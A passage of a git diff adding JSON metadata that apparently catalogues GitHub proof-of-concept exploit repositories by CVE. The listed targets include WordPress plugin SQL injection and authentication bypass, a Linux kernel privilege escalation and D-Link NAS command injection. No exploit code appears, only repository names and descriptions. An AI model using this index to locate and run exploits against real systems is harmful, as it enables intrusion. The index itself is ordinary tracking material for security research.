"description": "POC CVE-2024-10654", + "fork": false, + "created_at": "2024-10-31T03:48:22Z", + "updated_at": "2024-11-01T14:25:39Z", + "pushed_at": "2024-11-01T14:18:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1071.json b/2024/CVE-2024-1071.json new file mode 100644 index 0000000000..1c8052d14a --- /dev/null +++ b/2024/CVE-2024-1071.json @@ -0,0 +1,219 @@ +[ + { + "id": 764046735, + "name": "CVE-2024-1071", + "full_name": "gbrsh\/CVE-2024-1071", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2024-1071", + "description": "Ultimate Member Unauthorized Database Access \/ SQLi", + "fork": false, + "created_at": "2024-02-27T11:41:53Z", + "updated_at": "2024-11-20T16:30:41Z", + "pushed_at": "2024-02-27T11:45:50Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 767118935, + "name": "CVE-2024-1071-Docker", + "full_name": "Trackflaw\/CVE-2024-1071-Docker", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2024-1071-Docker", + "description": "CVE-2024-1071 with Docker", + "fork": false, + "created_at": "2024-03-04T18:29:17Z", + "updated_at": "2024-08-25T01:26:45Z", + "pushed_at": "2024-03-05T18:35:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773939193, + "name": "CVE-2024-1071", + "full_name": "Matrexdz\/CVE-2024-1071", + "owner": { + "login": "Matrexdz", + "id": 161771152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161771152?v=4", + "html_url": "https:\/\/github.com\/Matrexdz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Matrexdz\/CVE-2024-1071", + "description": "CVE-2024-1071", + "fork": false, + "created_at": "2024-03-18T16:58:46Z", + "updated_at": "2024-03-18T17:12:07Z", + "pushed_at": "2024-03-18T17:04:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773943544, + "name": "CVE-2024-1071-Docker", + "full_name": "Matrexdz\/CVE-2024-1071-Docker", + "owner": { + "login": "Matrexdz", + "id": 161771152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161771152?v=4", + "html_url": "https:\/\/github.com\/Matrexdz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Matrexdz\/CVE-2024-1071-Docker", + "description": null, + "fork": false, + "created_at": "2024-03-18T17:07:27Z", + "updated_at": "2024-03-18T17:12:06Z", + "pushed_at": "2024-03-18T17:09:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 849694443, + "name": "CVE-2024-1071-SQL-Injection", + "full_name": "gh-ost00\/CVE-2024-1071-SQL-Injection", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-1071-SQL-Injection", + "description": "Proof of concept : CVE-2024-1071: WordPress Vulnerability Exploited", + "fork": false, + "created_at": "2024-08-30T04:23:04Z", + "updated_at": "2024-11-13T14:39:17Z", + "pushed_at": "2024-08-30T05:10:51Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 857700493, + "name": "WordPress-Exploit-CVE-2024-1071", + "full_name": "Dogu589\/WordPress-Exploit-CVE-2024-1071", + "owner": { + "login": "Dogu589", + "id": 73641405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73641405?v=4", + "html_url": "https:\/\/github.com\/Dogu589", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dogu589\/WordPress-Exploit-CVE-2024-1071", + "description": null, + "fork": false, + "created_at": "2024-09-15T11:28:47Z", + "updated_at": "2024-10-03T20:08:55Z", + "pushed_at": "2024-09-15T12:28:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 881948753, + "name": "CVE-2024-1071-PoC-Script", + "full_name": "Spid3heX\/CVE-2024-1071-PoC-Script", + "owner": { + "login": "Spid3heX", + "id": 183846301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/183846301?v=4", + "html_url": "https:\/\/github.com\/Spid3heX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Spid3heX\/CVE-2024-1071-PoC-Script", + "description": "wp\/ultimate-member - SQL Injection Vulnerability Exploit Script.", + "fork": false, + "created_at": "2024-11-01T14:57:34Z", + "updated_at": "2024-11-03T03:53:40Z", + "pushed_at": "2024-11-01T18:14:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10728.json b/2024/CVE-2024-10728.json new file mode 100644 index 0000000000..90ac245fe5 --- /dev/null +++ b/2024/CVE-2024-10728.json @@ -0,0 +1,33 @@ +[ + { + "id": 889424362, + "name": "CVE-2024-10728", + "full_name": "RandomRobbieBF\/CVE-2024-10728", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10728", + "description": "PostX <= 4.1.16 - Missing Authorization to Arbitrary Plugin Installation\/Activation", + "fork": false, + "created_at": "2024-11-16T10:51:56Z", + "updated_at": "2024-11-16T11:00:46Z", + "pushed_at": "2024-11-16T11:00:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10793.json b/2024/CVE-2024-10793.json new file mode 100644 index 0000000000..2e9fa81a06 --- /dev/null +++ b/2024/CVE-2024-10793.json @@ -0,0 +1,33 @@ +[ + { + "id": 889993152, + "name": "CVE-2024-10793", + "full_name": "windz3r0day\/CVE-2024-10793", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-10793", + "description": "CVE-2024-10793 poc exploit", + "fork": false, + "created_at": "2024-11-17T18:44:53Z", + "updated_at": "2024-11-18T20:09:02Z", + "pushed_at": "2024-11-17T19:51:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1086.json b/2024/CVE-2024-1086.json new file mode 100644 index 0000000000..545bbe8c9a --- /dev/null +++ b/2024/CVE-2024-1086.json @@ -0,0 +1,194 @@ +[ + { + "id": 775151369, + "name": "CVE-2024-1086", + "full_name": "Notselwyn\/CVE-2024-1086", + "owner": { + "login": "Notselwyn", + "id": 68616630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68616630?v=4", + "html_url": "https:\/\/github.com\/Notselwyn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Notselwyn\/CVE-2024-1086", + "description": "Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.", + "fork": false, + "created_at": "2024-03-20T21:16:41Z", + "updated_at": "2024-11-27T18:47:19Z", + "pushed_at": "2024-04-17T16:09:54Z", + "stargazers_count": 2285, + "watchers_count": 2285, + "has_discussions": false, + "forks_count": 298, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-1086", + "exploit", + "lpe", + "poc" + ], + "visibility": "public", + "forks": 298, + "watchers": 2285, + "score": 0, + "subscribers_count": 24 + }, + { + "id": 781477717, + "name": "docker-POC_CVE-2024-1086", + "full_name": "Alicey0719\/docker-POC_CVE-2024-1086", + "owner": { + "login": "Alicey0719", + "id": 54524362, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54524362?v=4", + "html_url": "https:\/\/github.com\/Alicey0719", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alicey0719\/docker-POC_CVE-2024-1086", + "description": null, + "fork": false, + "created_at": "2024-04-03T13:09:22Z", + "updated_at": "2024-06-18T07:54:41Z", + "pushed_at": "2024-05-19T06:51:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 794185753, + "name": "CVE-2024-1086", + "full_name": "CCIEVoice2009\/CVE-2024-1086", + "owner": { + "login": "CCIEVoice2009", + "id": 71173516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71173516?v=4", + "html_url": "https:\/\/github.com\/CCIEVoice2009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CCIEVoice2009\/CVE-2024-1086", + "description": null, + "fork": false, + "created_at": "2024-04-30T16:10:37Z", + "updated_at": "2024-04-30T16:13:05Z", + "pushed_at": "2024-04-30T16:13:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810010339, + "name": "CVE-2024-1086-checker", + "full_name": "kevcooper\/CVE-2024-1086-checker", + "owner": { + "login": "kevcooper", + "id": 6468064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6468064?v=4", + "html_url": "https:\/\/github.com\/kevcooper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kevcooper\/CVE-2024-1086-checker", + "description": null, + "fork": false, + "created_at": "2024-06-03T22:04:03Z", + "updated_at": "2024-06-10T17:13:10Z", + "pushed_at": "2024-06-10T17:13:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813156753, + "name": "CVE-2024-1086", + "full_name": "feely666\/CVE-2024-1086", + "owner": { + "login": "feely666", + "id": 35380145, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35380145?v=4", + "html_url": "https:\/\/github.com\/feely666", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/feely666\/CVE-2024-1086", + "description": null, + "fork": false, + "created_at": "2024-06-10T15:19:39Z", + "updated_at": "2024-06-10T15:25:31Z", + "pushed_at": "2024-06-10T15:25:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824093061, + "name": "CVE-2024-1086", + "full_name": "xzx482\/CVE-2024-1086", + "owner": { + "login": "xzx482", + "id": 46856523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46856523?v=4", + "html_url": "https:\/\/github.com\/xzx482", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xzx482\/CVE-2024-1086", + "description": null, + "fork": false, + "created_at": "2024-07-04T10:51:35Z", + "updated_at": "2024-07-04T10:54:26Z", + "pushed_at": "2024-07-04T10:54:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10914.json b/2024/CVE-2024-10914.json new file mode 100644 index 0000000000..49b46031be --- /dev/null +++ b/2024/CVE-2024-10914.json @@ -0,0 +1,234 @@ +[ + { + "id": 885936481, + "name": "CVE-2024-10914", + "full_name": "imnotcha0s\/CVE-2024-10914", + "owner": { + "login": "imnotcha0s", + "id": 64480742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64480742?v=4", + "html_url": "https:\/\/github.com\/imnotcha0s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imnotcha0s\/CVE-2024-10914", + "description": "Exploit for cve-2024-10914: D-Link DNS-320, DNS-320LW, DNS-325, DNS-340L Version 1.00, Version 1.01.0914.2012, Version 1.01, Version 1.02, Version 1.08 Command Injection", + "fork": false, + "created_at": "2024-11-09T19:30:39Z", + "updated_at": "2024-11-27T14:57:29Z", + "pushed_at": "2024-11-09T19:31:42Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 886174538, + "name": "CVE-2024-10914", + "full_name": "verylazytech\/CVE-2024-10914", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-10914", + "description": "POC - CVE-2024–10914- Command Injection Vulnerability in `name` parameter for D-Link NAS", + "fork": false, + "created_at": "2024-11-10T12:01:21Z", + "updated_at": "2024-11-28T16:25:10Z", + "pushed_at": "2024-11-27T08:26:29Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-10914", + "d-link-nas", + "lfi", + "lfi-exploitation", + "poc", + "rce-exploit", + "unauthenticated-rce" + ], + "visibility": "public", + "forks": 12, + "watchers": 40, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887759528, + "name": "CVE-2024-10914", + "full_name": "Egi08\/CVE-2024-10914", + "owner": { + "login": "Egi08", + "id": 60685799, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60685799?v=4", + "html_url": "https:\/\/github.com\/Egi08", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Egi08\/CVE-2024-10914", + "description": "CVE-2024-10914_Manual testing with burpsuite ", + "fork": false, + "created_at": "2024-11-13T08:33:16Z", + "updated_at": "2024-11-16T04:27:57Z", + "pushed_at": "2024-11-13T09:39:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 888892906, + "name": "D-Link-NAS-CVE-2024-10914-", + "full_name": "Bu0uCat\/D-Link-NAS-CVE-2024-10914-", + "owner": { + "login": "Bu0uCat", + "id": 169526025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169526025?v=4", + "html_url": "https:\/\/github.com\/Bu0uCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bu0uCat\/D-Link-NAS-CVE-2024-10914-", + "description": "这是一个D-Link rce漏洞 检测程序", + "fork": false, + "created_at": "2024-11-15T07:56:21Z", + "updated_at": "2024-11-15T07:59:44Z", + "pushed_at": "2024-11-15T07:59:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889560261, + "name": "CVE-2024-10914", + "full_name": "ThemeHackers\/CVE-2024-10914", + "owner": { + "login": "ThemeHackers", + "id": 107047730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107047730?v=4", + "html_url": "https:\/\/github.com\/ThemeHackers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThemeHackers\/CVE-2024-10914", + "description": "CVE-2024-10914 is a critical command injection vulnerability affecting several legacy D-Link Network Attached Storage (NAS) devices.", + "fork": false, + "created_at": "2024-11-16T16:32:05Z", + "updated_at": "2024-11-20T16:31:11Z", + "pushed_at": "2024-11-16T16:38:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895213023, + "name": "cve-2024-10914-port", + "full_name": "retuci0\/cve-2024-10914-port", + "owner": { + "login": "retuci0", + "id": 165311393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165311393?v=4", + "html_url": "https:\/\/github.com\/retuci0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/retuci0\/cve-2024-10914-port", + "description": "dlink vulnerability thing in python and rust", + "fork": false, + "created_at": "2024-11-27T19:11:55Z", + "updated_at": "2024-11-27T19:12:49Z", + "pushed_at": "2024-11-27T19:12:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895284938, + "name": "CVE-2024-10914-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2024-10914-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-10914-EXPLOIT", + "description": "A PoC exploit for CVE-2024-10914 - D-Link Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-11-27T23:10:20Z", + "updated_at": "2024-11-27T23:33:14Z", + "pushed_at": "2024-11-27T23:31:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-10914", + "ethical-hacking", + "exploit", + "exploitation", + "hacking", + "proof-of-concept" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10924.json b/2024/CVE-2024-10924.json new file mode 100644 index 0000000000..f0824c8563 --- /dev/null +++ b/2024/CVE-2024-10924.json @@ -0,0 +1,239 @@ +[ + { + "id": 888592127, + "name": "CVE-2024-10924", + "full_name": "RandomRobbieBF\/CVE-2024-10924", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10924", + "description": " Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – Authentication Bypass", + "fork": false, + "created_at": "2024-11-14T16:59:52Z", + "updated_at": "2024-11-21T00:35:21Z", + "pushed_at": "2024-11-14T17:00:59Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890585149, + "name": "wordpress-really-simple-security-authn-bypass-vulnerable-application", + "full_name": "m3ssap0\/wordpress-really-simple-security-authn-bypass-vulnerable-application", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/wordpress-really-simple-security-authn-bypass-vulnerable-application", + "description": "WARNING: This is a vulnerable application to test the exploit for the Really Simple Security < 9.1.2 authentication bypass (CVE-2024-10924). Run it at your own risk!", + "fork": false, + "created_at": "2024-11-18T20:37:07Z", + "updated_at": "2024-11-25T19:14:25Z", + "pushed_at": "2024-11-19T12:19:36Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "cve-2024-10924", + "really-simple-security", + "vulnerable-application", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890703149, + "name": "CVE-2024-10924", + "full_name": "MattJButler\/CVE-2024-10924", + "owner": { + "login": "MattJButler", + "id": 90148954, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90148954?v=4", + "html_url": "https:\/\/github.com\/MattJButler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MattJButler\/CVE-2024-10924", + "description": "Simple Python script", + "fork": false, + "created_at": "2024-11-19T03:06:49Z", + "updated_at": "2024-11-19T03:08:57Z", + "pushed_at": "2024-11-19T03:08:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890862229, + "name": "wordpress-really-simple-security-authn-bypass-exploit", + "full_name": "m3ssap0\/wordpress-really-simple-security-authn-bypass-exploit", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/wordpress-really-simple-security-authn-bypass-exploit", + "description": "Exploits Really Simple Security < 9.1.2 authentication bypass (CVE-2024-10924).", + "fork": false, + "created_at": "2024-11-19T10:07:28Z", + "updated_at": "2024-11-28T06:03:52Z", + "pushed_at": "2024-11-19T12:20:16Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-10924", + "exploit", + "really-simple-security", + "security", + "security-tools", + "vulnerability", + "vulnerability-scan", + "wordpress" + ], + "visibility": "public", + "forks": 13, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891508423, + "name": "CVE-2024-10924", + "full_name": "julesbsz\/CVE-2024-10924", + "owner": { + "login": "julesbsz", + "id": 38622433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38622433?v=4", + "html_url": "https:\/\/github.com\/julesbsz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/julesbsz\/CVE-2024-10924", + "description": "POC for CVE-2024-10924 written in Python", + "fork": false, + "created_at": "2024-11-20T13:13:15Z", + "updated_at": "2024-11-20T19:40:44Z", + "pushed_at": "2024-11-20T14:00:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-10924", + "python", + "really-simple-security", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891621160, + "name": "CVE-2024-10924-Wordpress-Docker", + "full_name": "Trackflaw\/CVE-2024-10924-Wordpress-Docker", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2024-10924-Wordpress-Docker", + "description": "Vulnerable docker container for Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – Authentication Bypass CVE-2023-50164", + "fork": false, + "created_at": "2024-11-20T16:50:24Z", + "updated_at": "2024-11-25T19:41:23Z", + "pushed_at": "2024-11-22T09:28:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 894993174, + "name": "CVE-2024-10924-PoC", + "full_name": "Maalfer\/CVE-2024-10924-PoC", + "owner": { + "login": "Maalfer", + "id": 96432001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96432001?v=4", + "html_url": "https:\/\/github.com\/Maalfer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Maalfer\/CVE-2024-10924-PoC", + "description": "Bypass del MFA en WordPress con el plugin Really Simple Security instalado entre las versiones 9.0.0 – 9.1.1.1.", + "fork": false, + "created_at": "2024-11-27T11:19:47Z", + "updated_at": "2024-11-27T14:14:01Z", + "pushed_at": "2024-11-27T14:13:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10958.json b/2024/CVE-2024-10958.json new file mode 100644 index 0000000000..0423b28798 --- /dev/null +++ b/2024/CVE-2024-10958.json @@ -0,0 +1,33 @@ +[ + { + "id": 886253464, + "name": "CVE-2024-10958-WPPA-Exploit", + "full_name": "reinh3rz\/CVE-2024-10958-WPPA-Exploit", + "owner": { + "login": "reinh3rz", + "id": 144375735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144375735?v=4", + "html_url": "https:\/\/github.com\/reinh3rz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reinh3rz\/CVE-2024-10958-WPPA-Exploit", + "description": null, + "fork": false, + "created_at": "2024-11-10T15:43:14Z", + "updated_at": "2024-11-11T11:53:02Z", + "pushed_at": "2024-11-10T16:41:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11003.json b/2024/CVE-2024-11003.json new file mode 100644 index 0000000000..dc91cf24cd --- /dev/null +++ b/2024/CVE-2024-11003.json @@ -0,0 +1,33 @@ +[ + { + "id": 895398083, + "name": "CVE-2024-11003-PoC", + "full_name": "unknown-user-from\/CVE-2024-11003-PoC", + "owner": { + "login": "unknown-user-from", + "id": 51774599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51774599?v=4", + "html_url": "https:\/\/github.com\/unknown-user-from", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/unknown-user-from\/CVE-2024-11003-PoC", + "description": "CVE-2024-11003 